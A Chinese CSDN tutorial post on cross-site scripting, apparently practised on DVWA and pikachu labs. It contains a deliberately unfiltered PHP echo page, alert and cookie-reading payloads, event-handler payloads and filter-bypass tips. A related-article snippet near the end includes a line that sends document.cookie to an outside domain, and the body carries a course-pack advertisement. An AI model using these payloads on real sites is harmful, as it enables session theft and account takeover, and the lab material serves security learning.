最新网络安全-跨站脚本攻击(XSS)的原理、攻击及防御_xsstrike原理(1)

最新推荐文章于 2024-08-16 18:08:04 发布
最新推荐文章于 2024-08-16 18:08:04 发布
阅读量719 收藏 25
点赞数 8
分类专栏: 程序员 文章标签: web安全 xss 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84239830/article/details/138392435
版权

靶机:dvwa、pikachu

XSS的类型

反射型XSS/不持久型XSS

选择的是echo函数,不加过滤,直接输出

input.php

<?php 
$input = $_GET['input'];
echo 'output:<br>'.$input;
?>

显示

可以看到我们的输入直接被输出。 那么,如果我们的参数是JavaScript代码呢?

<script>alert('xss attack by lady_killer9')</script>

js代码执行

也就是说js能够做到的事情,都可在这里插入去实现,比如跳转到钓鱼网站。

Firing Range的Html Body存在的反射型XSS

反射性XSS攻击之html Body

脚本插入

下面是在dvwa中的展示

插入js代码

提交

查看网页源代码

存储型XSS/持久型XSS

和反射型XSS的即时响应相比,存储型XSS则需要先把代码保存到数据库或文件中,下次读取时仍然会显示出来,利用的问题依然是没有对用户的输入进行过滤。使用靶机pikachu的存储型xss。

<script>alert(document.cookie)</script>

XSS注入

注入成功

注入后留言列表

基于DOM的XSS

基于文档对象模型(Document Object Model,DOM)的一种漏洞。客户端的脚本可以通过DOM动态地修改页面内容,它不依赖于提交数据到服务器,而是从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM型XSS漏洞。

没了解过DOM的可以看一看HTML DOM教程

HTML DOM就像数据结构中的树,有根节点,叶子节点等,通过document对象进行写入。

F12查看源代码

使用F12查看,发现是把id为text的输入框的内容显示出来。单引号闭合即可,而且F12的时候就直接看见了。

提示给的是

'onclick="alert('lady_killer9')">

我使用的是

'onclick='alert('lady_killer9')

注入成功

常用Payload与工具

XSS扫描工具

工具不在于多,学一个就可以了,我学习的是第一个网络安全-XSStrike中文手册(自学笔记)

Payloads
script标签类

对于没有过滤的很简单的XSS漏洞,可以使用
在这里插入图片描述

有的时候会过滤掉script,大小写、双写等无法绕过,可使用后面的payload。

结合js的html标签

可结合一些onclick、onerror等事件

<IMG οnmοuseοver=“alert(‘xxs’)”>

<img src=xss οnerrοr=alert(1)>

伪协议

上面的都不行的话,可以试试伪协议
在这里插入图片描述

绕过

大小写绕过
在这里插入图片描述
双写绕过

在这里插入图片描述

html编码绕过

等价于

在这里插入图片描述

等价于

在这里插入图片描述

标签优先级绕过

标签比标签解析优先性更高,所以会优先闭合,导致标签逃逸,从而造成xss执行

在这里插入图片描述 危害

  1. 用户的Cookie被获取,其中可能存在Session ID等敏感信息。若服务器端没有做相应防护,攻击者可用对应Cookie登陆服务器。
  2. 攻击者能够在一定限度内记录用户的键盘输入。
  3. 攻击者通过CSRF等方式以用户身份执行危险操作。
  4. XSS蠕虫。
  5. 获取用户浏览器信息。
  6. 利用XSS漏洞扫描用户内网。

本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。

最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。

最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。

学习路线图

其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。

相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。

网络安全工具箱

当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。

项目实战

最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84239830
关注
专栏目录
XSS跨站脚本攻击
weixin_30505225的博客
04-26 1072
1、简介 跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢? XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身...
网络安全-XSS原理攻击防御
msb_114的博客
06-04 696
跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意javascript代码(也可能包含html代码),当用户浏览网页之时,嵌入其中Web里面的JavaScript代码会被执行,从而达到恶意攻击用户的目的。XSS攻击客户端,最终受害者是用户,当然,网站管理员也是用户之一。XSS漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是。
Xss(cross-site scripting)攻击
stonehigher125的专栏
07-04 869
Xss(cross-site scripting)攻击指的是攻击者往Web页面里插入恶意html标签或者javascript代码,当用户浏览该页或者进行某些操作时,攻击者利用用户对原网站的信任,诱骗用户或浏览器执行一些不安全的操作或者向其它网站提交用户的私密信息。 比如:攻击者在论坛中放一个看似安全的链接,骗取用户点击后,窃取cookie中的用户私密信息;或者攻击者在论坛中加一个恶意表单,当用户
网络安全-跨站脚本攻击(XSS)的原理攻击防御
关注网络安全、云原生安全
08-01 4万+
所用工具 Google出品:开源Web App漏洞测试环境:Firing Range 简介 跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意Script代码,当用户浏览网页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss攻击客户端,最终受害者是用户,网站管理员也是用户之一。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过.
xss攻击原理与解决方法
套路猿的博客
04-14 7万+
概述XSS攻击Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨大的,是web安全的头号大敌。攻击的条件实施
【转】XSS跨站脚本攻击原理及防护方法
wanggp
11-07 400
摘要 XSS(Cross Site Script)跨站脚本攻击。它指的是恶意攻击者往Web 页面里插入恶意html 代码,当用户浏览该页之时,嵌入其中Web 里面的html 代码会被执行,从而达到恶意用户的特殊目的。本文介绍了该攻击方式,并给出了一些防范措施。 原理 XSS 属于被动式的攻击攻击者先构造一个跨站页面,利用script、&lt;IMG&gt;、&lt;IFRAME&...
Python-XSStrike是一个最先进的跨站脚本XSS检测套件
08-10
**Python XSStrike:先进的跨站脚本XSS检测套件** XSS(Cross Site Scripting)攻击是一种常见的网络安全威胁,攻击者通过注入恶意脚本到网页中,从而影响用户浏览器的行为。Python XSStrike是应对这种威胁的一款...
跨站脚本攻击XSS)的原理与应对方法
XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全漏洞,攻击者通过在目标网页中插入恶意脚本,使得用户在浏览网页时受到攻击XSS攻击主要分为以下几种类型: - 存储型XSS攻击者将恶意脚本存储在...
初步了解什么是跨站脚本攻击XSS
XSS攻击是一种针对Web应用的安全漏洞,攻击者通过在目标网站注入恶意脚本,利用用户对网页的信任将恶意脚本在用户的浏览器上执行,从而达到攻击的目的。 ## 1.3 XSS攻击的危害 XSS攻击的危害主要体现
安全性考量:跨站点脚本攻击XSS)与防范
跨站点脚本攻击(Cross-Site Scripting,XSS)是一种常见的Web安全漏洞,它允许攻击者将恶意脚本嵌入到网页中,使用户在浏览时执行这些恶意脚本,从而导致安全问题。 ## 1.2 XSS攻击的危害 XSS攻击的危害非常严重...
XSS-跨站脚本攻击
最新发布
qq_64177395的博客
08-16 1474
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets )的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往web页面里插入恶意script代码,当用户浏览该页时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的1.2 XSS类型反射型也称为非持久型,这种类型的脚本是最常见的,也是使用最为广泛的一种,主要用于将恶意的脚本附加到URL地址的参数中。
XSS跨站脚本攻击(一)----XSS攻击的三种类型
热门推荐
fendo
12-27 12万+
一、简介 什么是XSS? 百度百科的解释: XSS又叫CSS  (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在x
XSS跨站脚本攻击原理详解(内含攻击实例)
qq_52642385的博客
07-05 7039
军锋真人cs野战123平台、xss平台(推荐自行搭建xss平台,不让别人白嫖咱自个的成果,蓝莲花战队的那个就挺好)、webshell箱子、postman、beef(kali上可能要自行下载,三行命令即可)、burpsuite、xsstrike【内含软件使用方法】原理:前端提交的一些参数转换为js代码,可以回显一些东西跨站:例如你将一段攻击代码通过留言存储到对方服务器上时,对方管理员在浏览时就可能会执行你所写的攻击语句。产生层面:前端函数类:一般应用js里面的一些输出类函数但是会受浏览器内核影响,一些浏览器会
跨站脚本攻击原理攻击过程及防御方法简介
seek_2022的博客
05-03 8856
文章目录一、XSS简介(一)什么是XSS?(二)XSS的危害(三)XSS的分类(四)XSS的特性(五)XSS攻击过程二、如何防御XSS攻击?三、本文小结 一、XSS简介 (一)什么是XSS? Cross-Site Scripting,简称为XSS跨站脚本或跨站脚本攻击,是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。通常安全圈内的人喜欢称其为前端注入。 前端注入:用户输入的数据被当做前端代码执行(一般是当做JS代码执行)。 前端的三种代码中,出现XSS漏洞时,90%的情况下,注入的代码是被当
xss跨站脚本攻击原理
maluxiao123的博客
04-02 977
xss全称跨站脚本攻击,通过字面理解就是跨过网站进行攻击。其原理是前端提交的参数被当成网站js代码来被执行了。发生的场景通常在web的前端。比如我在网站的留言板处输入一个 这里 xss通常分为三种: 反射型: 存储型(持久型): dom型xss: ...
XSS攻击原理
asdfghjkl978564的博客
09-19 107
XSS全称cross-site scripting攻击指的是攻击者往Web页面里插入恶意html标签或者JavaScript代码,当用户浏览该页或者进行某些操作时,攻击者利用用户对原网站的信任,诱骗用户或浏览器执行一些不安全的操作或者向其它网站提交用户的私密信息。 比如:(1)点击一个看起来安全的链接, (2)恶意的表单传递到攻击者的服务器上 分类:(1)存储型XSS (2)反射型X...
跨站脚本攻击
JustinNeil的博客
08-15 438
跨站脚本攻击概念攻击原理危害防范手段 概念   跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。 攻击原理   例如有一个论坛网站,攻击者可以在上面发布以下内容: <script>location.href="//domain.com/?c=" + document.cookie&l...
XSS攻击原理
飞鸟Blog
09-04 1万+
<br />跨站脚本攻击XSS攻击与防范指南 <br /><br />文章目录 <br /><br />XSS攻击与防范指南... 1 <br /><br />第一章、XSS的定义... 1 <br /><br />第二章、XSS漏洞代码... 1 <br /><br />第三章、利用XSS盗取cookies. 3 <br /><br />第四章、防范XSS漏洞... 4 <br /><br />第四章、XSS攻击方法... 4 <br /><br />第六章、利用Flash进行XSS攻击... 6 <br
跨站脚本攻击XSS
weixin_44558065的博客
07-08 7880
XSS攻击 概念:XSS攻击是指攻击者利用网站程序对用户输入过滤不足的缺陷,输入可以显示在页面上或者对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 实质:跨站脚本攻击本质上是一种将恶意脚本嵌入到当前页面中并执行的攻击方式。通常黑客通过“HTML注入”行为篡改网页,并插入恶意JavaScript(JS)脚本,从而在用户浏览网页时控制浏览器的行为。 产生原因:网站对用户提交的数据过滤不严格,导致用户提交的数据可以修改当前页面或者插入一段脚本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值